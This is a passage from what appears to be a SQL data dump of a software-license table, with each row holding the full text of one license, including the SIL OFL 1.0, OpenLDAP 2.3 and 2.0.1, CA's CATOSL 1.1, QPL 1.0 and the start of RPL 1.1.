THE\nCOPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE FOR ANY DAMAGES\nOR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(305,'OFL-1.0','SIL OPEN FONT LICENSE\n\nVersion 1.0 - 22 November 2005\n\nPREAMBLE\n\nThe goals of the Open Font License (OFL) are to stimulate worldwide development\nof cooperative font projects, to support the font creation efforts of academic\nand linguistic communities, and to provide an open framework in which fonts\nmay be shared and improved in partnership with others.\n\nThe OFL allows the licensed fonts to be used, studied, modified and redistributed\nfreely as long as they are not sold by themselves. The fonts, including any\nderivative works, can be bundled, embedded, redistributed and sold with any\nsoftware provided that the font names of derivative works are changed. The\nfonts and derivatives, however, cannot be released under any other type of\nlicense.\n\nDEFINITIONS\n\n\"Font Software\" refers to any and all of the following:\n\n - font files\n\n - data files\n\n - source code\n\n - build scripts\n\n - documentation\n\n\"Reserved Font Name\" refers to the Font Software name as seen by users and\nany other names as specified after the copyright statement.\n\n\"Standard Version\" refers to the collection of Font Software components as\ndistributed by the Copyright Holder.\n\n\"Modified Version\" refers to any derivative font software made by adding to,\ndeleting, or substituting — in part or in whole -- any of the components of\nthe Standard Version, by changing formats or by porting the Font Software\nto a new environment.\n\n\"Author\" refers to any designer, engineer, programmer, technical writer or\nother person who contributed to the Font Software.\n\nPERMISSION & CONDITIONS\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof the Font Software, to use, study, copy, merge, embed, modify, redistribute,\nand sell modified and unmodified copies of the Font Software, subject to the\nfollowing conditions:\n\n1) Neither the Font Software nor any of its individual components, in Standard\nor Modified Versions, may be sold by itself.\n\n2) Standard or Modified Versions of the Font Software may be bundled, redistributed\nand sold with any software, provided that each copy contains the above copyright\nnotice and this license. These can be included either as stand-alone text\nfiles, human-readable headers or in the appropriate machine-readable metadata\nfields within text or binary files as long as those fields can be easily viewed\nby the user.\n\n3) No Modified Version of the Font Software may use the Reserved Font Name(s),\nin part or in whole, unless explicit written permission is granted by the\nCopyright Holder. This restriction applies to all references stored in the\nFont Software, such as the font menu name and other font description fields,\nwhich are used to differentiate the font from others.\n\n4) The name(s) of the Copyright Holder or the Author(s) of the Font Software\nshall not be used to promote, endorse or advertise any Modified Version, except\nto acknowledge the contribution(s) of the Copyright Holder and the Author(s)\nor with their explicit written permission.\n\n5) The Font Software, modified or unmodified, in part or in whole, must be\ndistributed using this license, and may not be distributed under any other\nlicense.\n\nTERMINATION\n\nThis license becomes null and void if any of the above conditions are not met.\n\nDISCLAIMER\n\nTHE FONT SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT,\nTRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL,\nINDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT\nSOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(306,'OLDAP-2.3','The OpenLDAP Public License\n\nVersion 2.3, 28 July 2000\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\n\n2. Redistributions in binary form must reproduce applicable copyright statements\nand notices, this list of conditions, and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\n 3. Redistributions must contain a verbatim copy of this document.\n\n4. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\n\n5. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation.\n\n6. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\n7. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent revision\nof the license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nOpenLDAP is a trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2000 The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distributed verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(307,'OLDAP-2.0.1','The OpenLDAP Public License\n\nVersion 2.0.1, 21 December 1999\n\nCopyright 1999, The OpenLDAP Foundation, Redwood City, California, USA. All\nRights Reserved.\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\nFor written permission, please contact foundation@openldap.org.\n\n4. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation. OpenLDAP is a trademark of the OpenLDAP Foundation.\n\n5. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(308,'CATOSL-1.1','Computer Associates Trusted Open Source License\n\nVersion 1.1\n\nPLEASE READ THIS DOCUMENT CAREFULLY AND IN ITS ENTIRETY. THE ACCOMPANYING\nPROGRAM IS PROVIDED UNDER THE TERMS OF THIS COMPUTER ASSOCIATES TRUSTED OPEN\nSOURCE LICENSE (\"LICENSE\"). ANY USE, REPRODUCTION, MODIFICATION OR DISTRIBUTION\nOF THE PROGRAM CONSTITUTES THE RECIPIENT\'S ACCEPTANCE OF THIS LICENSE.\n\nLicense Background\n\nComputer Associates International, Inc. (CA) believes in open source. We believe\nthat the open source development approach can take appropriate software programs\nto unprecedented levels of quality, growth, and innovation. To demonstrate\nour continuing commitment to open source, we are releasing the Program (as\ndefined below) under this License.\n\nThis License is intended to permit contributors and recipients of the Program\nto use the Program, including its source code, freely and without many of\nthe concerns of some other open source licenses. Although we expect the underlying\nProgram, and Contributions (as defined below) made to such Program, to remain\nopen, this License is designed to permit you to maintain your own software\nprograms free of this License unless you choose to do so. Thus, only your\nContributions to the Program must be distributed under the terms of this License.\n\nThe provisions that follow set forth the terms and conditions under which\nyou may use the Program.\n\n 1. DEFINITIONS\n\n1.1 Contribution means (a) in the case of CA, the Original Program; and (b)\nin the case of each Contributor (including CA), changes and additions to the\nProgram, where such changes and/or additions to the Program originate from\nand are distributed by that particular Contributor to unaffiliated third parties.\nA Contribution originates from a Contributor if it was added to the Program\nby such Contributor itself or anyone acting on such Contributors behalf. Contributions\ndo not include additions to the Program which: (x) are separate modules of\nsoftware distributed in conjunction with the Program under their own license\nagreement, and (y) are not derivative works of the Program.\n\n1.2 Contributor means CA and any other person or entity that distributes the\nProgram.\n\n1.3 Contributor Version means as to a Contributor, that version of the Program\nthat includes the Contributors Contribution but not any Contributions made\nto the Program thereafter.\n\n1.4 Larger Work means a work that combines the Program or portions thereof\nwith code not governed by the terms of this License.\n\n1.5 Licensed Patents mean patents licensable by a Contributor that are infringed\nby the use or sale of its Contribution alone or when combined with the Program.\n\n1.6 Original Program means the original version of the software to which this\nLicense is attached and as released by CA, including source code, object code\nand documentation, if any.\n\n 1.7 Program means the Original Program and Contributions.\n\n1.8 Recipient means anyone who modifies, copies, uses or distributes the Program.\n\n 2. GRANT OF RIGHTS\n\n2.1 Subject to the terms of this License, each Contributor hereby grants Recipient\nan irrevocable, non-exclusive, worldwide, royalty-free license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form. For the avoidance of doubt, the\nlicense provided in this Section 2.1 shall not include a license to any Licensed\nPatents of a Contributor.\n\n2.2 Subject to the terms of this License, each Contributor hereby grants Recipient\nan irrevocable, non-exclusive, worldwide, royalty-free license to the Licensed\nPatents to the extent necessary to make, use, sell, offer to sell and import\nthe Contribution of such Contributor, if any, in source code and object code\nform. The license granted in this Section 2.2 shall apply to the combination\nof the Contribution and the Program if, at the time the Contribution is added\nby the Contributor, such addition of the Contribution causes the Licensed\nPatents to be infringed by such combination. Notwithstanding the foregoing,\nno license is granted under this Section 2.2: (a) for any code or works that\ndo not include the Contributor Version, as it exists and is used in accordance\nwith the terms hereof; (b) for infringements caused by: (i) third party modifications\nof the Contributor Version; or (ii) the combination of Contributions made\nby each such Contributor with other software (except as part of the Contributor\nVersion) or other devices; or (c) with respect to Licensed Patents infringed\nby the Program in the absence of Contributions made by that Contributor.\n\n2.3 Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, except as provided in Section 2.4,\nno assurances are provided by any Contributor that the Program does not infringe\nthe patent or other intellectual property rights of any other person or entity.\nEach Contributor disclaims any liability to Recipient for claims brought by\nany other person or entity based on infringement of intellectual property\nrights or otherwise. As a condition to exercising the rights and licenses\ngranted hereunder, each Recipient hereby assumes sole responsibility to secure\nany other intellectual property rights needed, if any.\n\n2.4 Each Contributor represents and warrants that it has all right, title\nand interest in the copyrights in its Contributions, and has the right to\ngrant the copyright licenses set forth in this License.\n\n 3. DISTRIBUTION REQUIREMENTS\n\n3.1 If the Program is distributed in object code form, then a prominent notice\nmust be included in the code itself as well as in any related documentation,\nstating that the source code for the Program is available from the Contributor\nwith information on how and where to obtain the source code. A Contributor\nmay choose to distribute the Program in object code form under its own license\nagreement, provided that:\n\n * it complies with the terms and conditions of this License; and\n\n * its license agreement:\n\n* effectively disclaims on behalf of all Contributors all warranties and conditions,\nexpress and implied, including warranties or conditions of title and non-infringement,\nand implied warranties or conditions of merchantability and fitness for a\nparticular purpose, to the maximum extent permitted by applicable law;\n\n* effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits, to the maximum extent permitted by applicable law;\n\n* states that any provisions which are inconsistent with this License are\noffered by that Contributor alone and not by any other party; and\n\n* states that source code for the Program is available from such Contributor\nat the cost of distribution, and informs licensees how to obtain it in a reasonable\nmanner.\n\n 3.2 When the Program is made available in source code form:\n\n * it must be made available under this License; and\n\n* a copy of this License must be included with each copy of the Program.\n\n3.3 This License is intended to facilitate the commercial distribution of\nthe Program by any Contributor. However, Contributors may only charge Recipients\na one-time, upfront fee for the distribution of the Program. Contributors\nmay not charge Recipients any recurring charge, license fee, or any ongoing\nroyalty for the Recipients exercise of its rights under this License to the\nProgram. Contributors shall make the source code for the Contributor Version\nthey distribute available at a cost, if any, equal to the cost to the Contributor\nto physically copy and distribute the work. It is not the intent of this License\nto prohibit a Contributor from charging fees for any service or maintenance\nthat a Contributor may charge to a Recipient, so long as such fees are not\nan attempt to circumvent the foregoing restrictions on charging royalties\nor other recurring fees for the Program itself.\n\n3.4 A Contributor may create a Larger Work by combining the Program with other\nsoftware code not governed by the terms of this License, and distribute the\nLarger Work as a single product. In such a case, the Contributor must make\nsure that the requirements of this License are fulfilled for the Program.\nAny Contributor who includes the Program in a commercial product offering,\nincluding as part of a Larger Work, may subject itself, but not any other\nContributor, to additional contractual commitments, including, but not limited\nto, performance warranties and non-infringement representations on suchContributors\nbehalf. No Contributor may create any additional liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering,\nsuch Contributor (Commercial Contributor) hereby agrees to defend and indemnify\nevery other Contributor (Indemnified Contributor) who made Contributions to\nthe Program distributed by the Commercial Contributor against any losses,\ndamages and costs (collectively Losses) arising from claims, lawsuits and\nother legal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions, including any additional contractual\ncommitments, of such Commercial Contributor in connection with its distribution\nof the Program. The obligations in this section do not apply to any claims\nor Losses relating to any actual or alleged intellectual property infringement.\n\n3.5 If Contributor has knowledge that a license under a third partys intellectual\nproperty rights is required to exercise the rights granted by such Contributor\nunder Sections 2.1 or 2.2, Contributor must (a) include a text file with the\nProgram source code distribution titled ../IP_ISSUES, and (b) notify CA in\nwriting at Computer Associates International, Inc., One Computer Associates\nPlaza, Islandia, New York 11749, Attn: Open Source Group or by email at opensource@ca.com,\nboth describing the claim and the party making the claim in sufficient detail\nthat a Recipient and CA will know whom to contact with regard to such matter.\nIf Contributor obtains such knowledge after the Contribution is made available,\nContributor shall also promptly modify the IP_ISSUES file in all copies Contributor\nmakes available thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Program that such new knowledge has been obtained.\n\n3.6 Recipient shall not remove, obscure, or modify any CA or other Contributor\ncopyright or patent proprietary notices appearing in the Program, whether\nin the source code, object code or in any documentation. In addition to the\nobligations set forth in Section 4, each Contributor must identify itself\nas the originator of its Contribution, if any, in a manner that reasonably\nallows subsequent Recipients to identify the originator of the Contribution.\n\n 4. CONTRIBUTION RESTRICTIONS\n\n4.1 Each Contributor must cause the Program to which the Contributor provides\na Contribution to contain a file documenting the changes the Contributor made\nto create its version of the Program and the date of any change. Each Contributor\nmust also include a prominent statement that the Contribution is derived,\ndirectly or indirectly, from the Program distributed by a prior Contributor,\nincluding the name of the prior Contributor from which such Contribution was\nderived, in (a) the Program source code, and (b) in any notice in an executable\nversion or related documentation in which the Contributor describes the origin\nor ownership of the Program.\n\n 5. NO WARRANTY\n\n5.1 EXCEPT AS EXPRESSLY SET FORTH IN THIS LICENSE, THE PROGRAM IS PROVIDED\nAS IS AND IN ITS PRESENT STATE AND CONDITION. NO WARRANTY, REPRESENTATION,\nCONDITION, UNDERTAKING OR TERM, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE,\nAS TO THE CONDITION, QUALITY, DURABILITY, PERFORMANCE, NON-INFRINGEMENT, MERCHANTABILITY,\nOR FITNESS FOR A PARTICULAR PURPOSE OR USE OF THE PROGRAM IS GIVEN OR ASSUMED\nBY ANY CONTRIBUTOR AND ALL SUCH WARRANTIES, REPRESENTATIONS, CONDITIONS, UNDERTAKINGS\nAND TERMS ARE HEREBY EXCLUDED TO THE FULLEST EXTENT PERMITTED BY LAW.\n\n5.2 Each Recipient is solely responsible for determining the appropriateness\nof using and distributing the Program and assumes all risks associated with\nits exercise of rights under this License, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n5.3 Each Recipient acknowledges that the Program is not intended for use in\nthe operation of nuclear facilities, aircraft navigation, communication systems,\nor air traffic control machines in which case the failure of the Program could\nlead to death, personal injury, or severe physical or environmental damage.\n\n 6. DISCLAIMER OF LIABILITY\n\n6.1 EXCEPT AS EXPRESSLY SET FORTH IN THIS LICENSE, AND TO THE EXTENT PERMITTED\nBY LAW, NO CONTRIBUTOR SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT\nLIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE\nOF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGES.\n\n 7. TRADEMARKS AND BRANDING\n\n7.1 This License does not grant any Recipient or any third party any rights\nto use the trademarks or trade names now or subsequently posted at http://www.ca.com/catrdmrk.htm,\nor any other trademarks, service marks, logos or trade names belonging to\nCA (collectively CA Marks) or to any trademark, service mark, logo or trade\nname belonging to any Contributor. Recipient agrees not to use any CA Marks\nin or as part of the name of products derived from the Original Program or\nto endorse or promote products derived from the Original Program.\n\n7.2 Subject to Section 7.1, Recipients may distribute the Program under trademarks,\nlogos, and product names belonging to the Recipient provided that all copyright\nand other attribution notices remain in the Program.\n\n 8. PATENT LITIGATION\n\n8.1 If Recipient institutes patent litigation against any person or entity\n(including a cross-claim or counterclaim in a lawsuit) alleging that the Program\nitself (excluding combinations of the Program with other software or hardware)\ninfringes such Recipients patent(s), then such Recipients rights granted under\nSection 2.2 shall terminate as of the date such litigation is filed.\n\n 9. OWNERSHIP\n\n9.1 Subject to the licenses granted under this License in Sections 2.1 and\n2.2 above, each Contributor retains all rights, title and interest in and\nto any Contributions made by such Contributor. CA retains all rights, title\nand interest in and to the Original Program and any Contributions made by\nor on behalf of CA (CA Contributions), and such CA Contributions will not\nbe automatically subject to this License. CA may, at its sole discretion,\nchoose to license such CA Contributions under this License, or on different\nterms from those contained in this License or may choose not to license them\nat all.\n\n 10. TERMINATION\n\n10.1 All of Recipients rights under this License shall terminate if it fails\nto comply with any of the material terms or conditions of this License and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If Recipients rights under this License terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipients obligations under this License and any licenses\ngranted by Recipient as a Contributor relating to the Program shall continue\nand survive termination.\n\n 11. GENERAL\n\n11.1 If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\n11.2 CA may publish new versions (including revisions) of this License from\ntime to time. Each new version of the License will be given a distinguishing\nversion number. The Program (including Contributions) may always be distributed\nsubject to the version of the License under which it was received. In addition,\nafter a new version of the License is published, Contributor may elect to\ndistribute the Program (including its Contributions) under the new version.\nNo one other than CA has the right to modify this License.\n\n11.3 If it is impossible for Recipient to comply with any of the terms of\nthis License with respect to some or all of the Program due to statute, judicial\norder, or regulation, then Recipient must: (a) comply with the terms of this\nLicense to the maximum extent possible; and (b) describe the limitations and\nthe code they affect. Such description must be included in the IP_ISSUES file\ndescribed in Section 3.5 and must be included with all distributions of the\nProgram source code. Except to the extent prohibited by statute or regulation,\nsuch description must be sufficiently detailed for a Recipient of ordinary\nskill to be able to understand it.\n\n11.4 This License is governed by the laws of the State of New York. No Recipient\nwill bring a legal action under this License more than one year after the\ncause of action arose. Each Recipient waives its rights to a jury trial in\nany resulting litigation. Any litigation or other dispute resolution between\na Recipient and CA relating to this License shall take place in the State\nof New York, and Recipient and CA hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that district with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n11.5 Where Recipient is located in the province of Quebec, Canada, the following\nclause applies: The parties hereby confirm that they have requested that this\nLicense and all related documents be drafted in English. Les parties contractantes\nconfirment qu\'elles ont exige que le present contrat et tous les documents\nassocies soient rediges en anglais.\n\n11.6 The Program is subject to all export and import laws, restrictions and\nregulations of the country in which Recipient receives the Program. Recipient\nis solely responsible for complying with and ensuring that Recipient does\nnot export, re-export, or import the Program in violation of such laws, restrictions\nor regulations, or without any necessary licenses and authorizations.\n\n11.7 This License constitutes the entire agreement between the parties with\nrespect to the subject matter hereof.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(309,'xpp','LICENSE FOR THE Extreme! Lab PullParser\n\nCopyright (c) 2002 The Trustees of Indiana University. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1) All redistributions of source code must retain the above copyright notice,\nthe list of authors in the original source code, this list of conditions and\nthe disclaimer listed in this license;\n\n2) All redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the disclaimer listed in this license in the documentation\nand/or other materials provided with the distribution;\n\n3) Any documentation included with all redistributions must include the following\nacknowledgement:\n\n\"This product includes software developed by the Indiana University Extreme!\nLab. For further information please visit http://www.extreme.indiana.edu/\"\n\nAlternatively, this acknowledgment may appear in the software itself, and\nwherever such third-party acknowledgments normally appear.\n\n4) The name \"Indiana Univeristy\" and \"Indiana Univeristy Extreme! Lab\" shall\nnot be used to endorse or promote products derived from this software without\nprior written permission from Indiana University. For written permission,\nplease contact http://www.extreme.indiana.edu/.\n\n5) Products derived from this software may not use \"Indiana Univeristy\" name\nnor may \"Indiana Univeristy\" appear in their name, without prior written permission\nof the Indiana University. Indiana University provides no reassurances that\nthe source code provided does not infringe the patent or any other intellectual\nproperty rights of any other entity. Indiana University disclaims any liability\nto any recipient for claims brought by any other entity based on infringement\nof intellectual property rights or otherwise.\n\nLICENSEE UNDERSTANDS THAT SOFTWARE IS PROVIDED \"AS IS\" FOR WHICH NO WARRANTIES\nAS TO CAPABILITIES OR ACCURACY ARE MADE. INDIANA UNIVERSITY GIVES NO WARRANTIES\nAND MAKES NO REPRESENTATION THAT SOFTWARE IS FREE OF INFRINGEMENT OF THIRD\nPARTY PATENT, COPYRIGHT, OR OTHER PROPRIETARY RIGHTS. INDIANA UNIVERSITY MAKES\nNO WARRANTIES THAT SOFTWARE IS FREE FROM \"BUGS\", \"VIRUSES\", \"TROJAN HORSES\",\n\"TRAP DOORS\", \"WORMS\", OR OTHER HARMFUL CODE. LICENSEE ASSUMES THE ENTIRE\nRISK AS TO THE PERFORMANCE OF SOFTWARE AND/OR ASSOCIATED MATERIALS, AND TO\nTHE PERFORMANCE AND VALIDITY OF INFORMATION GENERATED USING SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(310,'QPL-1.0','THE Q PUBLIC LICENSE version 1.0\n\nCopyright (C) 1999-2005 Trolltech AS, Norway.\n\nEveryone is permitted to copy and distribute this license document.\n\nThe intent of this license is to establish freedom to share and change the\nsoftware regulated by this license under the open source model.\n\nThis license applies to any software containing a notice placed by the copyright\nholder saying that it may be distributed under the terms of the Q Public License\nversion 1.0. Such software is herein referred to as the Software. This license\ncovers modification and distribution of the Software, use of third-party application\nprograms based on the Software, and development of free software which uses\nthe Software.\n\nGranted Rights\n\n1. You are granted the non-exclusive rights set forth in this license provided\nyou agree to and comply with any and all conditions in this license. Whole\nor partial distribution of the Software, or software items that link with\nthe Software, in any form signifies acceptance of this license.\n\n2. You may copy and distribute the Software in unmodified form provided that\nthe entire package, including - but not restricted to - copyright, trademark\nnotices and disclaimers, as released by the initial developer of the Software,\nis distributed.\n\n3. You may make modifications to the Software and distribute your modifications,\nin a form that is separate from the Software, such as patches. The following\nrestrictions apply to modifications:\n\na. Modifications must not alter or remove any copyright notices in the Software.\n\nb. When modifications to the Software are released under this license, a non-exclusive\nroyalty-free right is granted to the initial developer of the Software to\ndistribute your modification in future versions of the Software provided such\nversions remain available under these terms in addition to any other license(s)\nof the initial developer.\n\n4. You may distribute machine-executable forms of the Software or machine-executable\nforms of modified versions of the Software, provided that you meet these restrictions:\n\n a. You must include this license document in the distribution.\n\nb. You must ensure that all recipients of the machine-executable forms are\nalso able to receive the complete machine-readable source code to the distributed\nSoftware, including all modifications, without any charge beyond the costs\nof data transfer, and place prominent notices in the distribution explaining\nthis.\n\nc. You must ensure that all modifications included in the machine-executable\nforms are available under the terms of this license.\n\n5. You may use the original or modified versions of the Software to compile,\nlink and run application programs legally developed by you or by others.\n\n6. You may develop application programs, reusable components and other software\nitems that link with the original or modified versions of the Software. These\nitems, when distributed, are subject to the following requirements:\n\na. You must ensure that all recipients of machine-executable forms of these\nitems are also able to receive and use the complete machine-readable source\ncode to the items without any charge beyond the costs of data transfer.\n\nb. You must explicitly license all recipients of your items to use and re-distribute\noriginal and modified versions of the items in both machine-executable and\nsource code forms. The recipients must be able to do so without any charges\nwhatsoever, and they must be able to re-distribute to anyone they choose.\n\nc. If the items are not available to the general public, and the initial developer\nof the Software requests a copy of the items, then you must supply one.\n\nLimitations of Liability\n\nIn no event shall the initial developers or copyright holders be liable for\nany damages whatsoever, including - but not restricted to - lost revenue or\nprofits or other direct, indirect, special, incidental or consequential damages,\neven if they have been advised of the possibility of such damages, except\nto the extent invariable law, if any, provides otherwise.\n\nNo Warranty\n\nThe Software and this license document are provided AS IS with NO WARRANTY\nOF ANY KIND, INCLUDING THE WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE.\n\nChoice of Law\n\nThis license is governed by the Laws of Norway. Disputes shall be settled\nby Oslo City Court.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(311,'Latex2e','Copyright (C) 2007, 2008, 2009, 2010 Karl Berry.\n\nCopyright (C) 1988, 1994, 2007 Stephen Gilmore.\n\nCopyright (C) 1994, 1995, 1996 Torsten Martinsen.\n\nPermission is granted to make and distribute verbatim copies of this manual\nprovided the copyright notice and this permission notice are preserved on\nall copies.\n\nPermission is granted to copy and distribute modified versions of this manual\nunder the conditions for verbatim copying, provided that the entire resulting\nderived work is distributed under the terms of a permission notice identical\nto this one.\n\nPermission is granted to copy and distribute translations of this manual into\nanother language, under the above conditions for modified versions.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(312,'RPL-1.1','Reciprocal Public License, version 1.1\n\nCopyright (C) 2001-2002 Technical Pursuit Inc., All Rights Reserved. PREAMBLE\n\nThis Preamble is intended to describe, in plain English, the nature, intent,\nand scope of this License. However, this Preamble is not a part of this License.\nThe legal effect of this License is dependent only upon the terms of the License\nand not this Preamble.\n\nThis License is based on the concept of reciprocity. In exchange for being\ngranted certain rights under the terms of this License to Licensor\'s Software,\nwhose Source Code You have access to, You are required to reciprocate by providing\nequal access and rights to all third parties to the Source Code of any Modifications,\nDerivative Works, and Required Components for execution of same (collectively\ndefined as Extensions) that You Deploy by Deploying Your Extensions under\nthe terms of this License. In this fashion the available Source Code related\nto the original Licensed Software is enlarged for the benefit of everyone.\n\nUnder the terms of this License You may:\n\na. Distribute the Licensed Software exactly as You received it under the terms\nof this License either alone or as a component of an aggregate software distribution\ncontaining programs from several different sources without payment of a royalty\nor other fee.\n\nb. Use the Licensed Software for any purpose consistent with the rights granted\nby this License, but the Licensor is not providing You any warranty whatsoever,\nnor is the Licensor accepting any liability in the event that the Licensed\nSoftware doesn\'t work properly or causes You any injury or damages.\n\nc. Create Extensions to the Licensed Software consistent with the rights granted\nby this License, provided that You make the Source Code to any Extensions\nYou Deploy available to all third parties under the terms of this License,\ndocument Your Modifications clearly, and title all Extensions distinctly from\nthe Licensed Software.\n\nd. Charge a fee for warranty or support, or for accepting indemnity or liability\nobligations for Your customers.\n\nUnder the terms of this License You may not:\n\na. Charge for the Source Code to the Licensed Software, or Your Extensions,\nother than a nominal fee not to exceed Your cost for reproduction and distribution\nwhere such reproduction and distribution involve physical media.\n\nb. Modify or delete any pre-existing copyright notices, change notices, or\nLicense text in the Licensed Software.\n\nc. Assert any patent claims against the Licensor or Contributors, or which\nwould in any way restrict the ability of any third party to use the Licensed\nSoftware or portions thereof in any form under the terms of this License,\nor Your rights to the Licensed Software under this License automatically terminate.\n\nd. Represent either expressly or by implication, appearance, or otherwise\nthat You represent Licensor or\n\nContributors in any capacity or that You have any form of legal association\nby virtue of this License.\n\nUnder the terms of this License You must:\n\na. Document any Modifications You make to the 